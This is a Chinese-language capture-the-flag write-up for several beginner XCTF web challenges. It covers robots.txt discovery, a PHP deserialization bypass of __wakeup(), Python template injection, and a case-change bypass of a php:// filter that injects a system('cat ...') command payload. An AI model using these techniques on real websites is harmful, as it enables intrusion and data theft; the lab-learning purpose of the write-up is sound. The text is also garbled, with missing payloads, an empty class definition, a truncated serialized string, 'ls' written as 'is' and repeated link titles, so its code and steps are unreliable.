攻防世界 Web（一）

1.根據題目提示，初始頁面即為index，將1.php改為index.php，發現依然跳轉成1.php，嘗試修改抓包，出現如下回顯，

2.在header中獲取flag，

flag

1.進入頁面，

2.直接：http://ip:埠/robots.txt就能夠訪問，得到robots協議，發現乙個fl0g.php但是無法訪問，我們嘗試直接訪問，（用御劍直接掃瞄靶場也可得到php檔案，直接訪問同樣可以獲取flag）

cyberpeace

補充：

關於robots：

它通常告訴網路搜尋引擎的漫遊器（又稱網路蜘蛛），此**中的哪些內容是不應被搜尋引擎的漫遊器獲取的，哪些是可以被漫遊器獲取的。

因為一些系統中的url是大小寫敏感的，所以robots.txt的檔名應統一為小寫。robots.txt應放置於**的根目錄下。

如果想單獨定義搜尋引擎的漫遊器訪問子目錄時的行為，那麼可以將自定的設定合併到根目錄下的robots.txt，或者使用robots元資料（metadata，又稱元資料）。

robots協議並不是乙個規範，而只是約定俗成的，所以並不能保證**的隱私。

**的根目錄放乙個robots.txt,會告訴搜尋引擎這個**裡的那些檔案可以訪問，哪些不可以，

1.進入頁面，檢視**可知，要求通過_get提交code值，繞過__wakeup()這個魔術方法，

2.利用反序列化漏洞：__wakeup()漏洞就是與整個屬性個數值有關。當序列化字串中表示物件屬性個數的值大於真實的屬性個數時會跳過__wakeup()的執行。

<?php 
class
xctf
}$x=new
xctf();
echo serialize($x);
?>

獲取反序列化的值：

o:4:"

xctf

":1:

3.修改反序列化值為：

cyberpeace

補充：

php的序列化和反序列化：
php的序列化和反序列化由serialize()和unserialize()這兩個函式來完成。
serialize()完成序列化的操作，將傳入的值轉換為序列化後的字串，
而unserialize()完成反序列化的操作，將字串轉換成原來的變數。
（掛一張網圖）

注意：① 當屬性為private屬性時，它會在兩側加入空位元組，導致其長度會增加2

② 序列化物件時只會序列化物件中的屬性值，不會序列化其中的函式

魔術方法

php中以兩個下劃線開頭的方法，__construct(), __destruct (), __call(), __callstatic(),__get(), __set(), __isset(), __unset (), __sleep(), __wakeup(), __tostring(), __set_state,() __clone() __autoload()等，被稱為"魔術方法"（magic methods）。這些方法在一定條件下有特殊的功能

與序列化和反序列化的魔術方法主要是：

參考：

1.進入頁面，通過}可以判斷存在python模板注入，

2.利用}可以檢視伺服器的配置資訊

4.尋找可用引用，

5.可以看到有乙個type file型別(可以進行檔案讀取)

flag：

ctf

參考：

1.分析**，可以看出只要有php://就會無限迴圈，

<?php 
show_source(__file__);
echo $_get[
'hello'];
$page=$_get['
page'];
while (strstr($page, "
php://
")) 
include($page);
?>

2. strstr(str1,str2) 函式用於判斷字串str2是否是str1的子串。

如果是，則該函式返回 str1字串從 str2第一次出現的位置開始到 str1結尾的字串；否則，返回null。

strstr函式對大小寫敏感，改成大寫的php://

3.post傳入：

<?php system("is");?>

4.出現了三個檔案，flag應該是在fl4g***.php這個檔案中

用cat命令開啟，<?php system ("cat fl4gisisish3r3.php")?>

flag：

ctf

參考：

攻防世界 Web（一）

Web攻防世界（一）

攻防世界web

攻防世界 Web篇

攻防世界 Web（一）

Web攻防世界（一）

攻防世界web

攻防世界 Web篇

相關推薦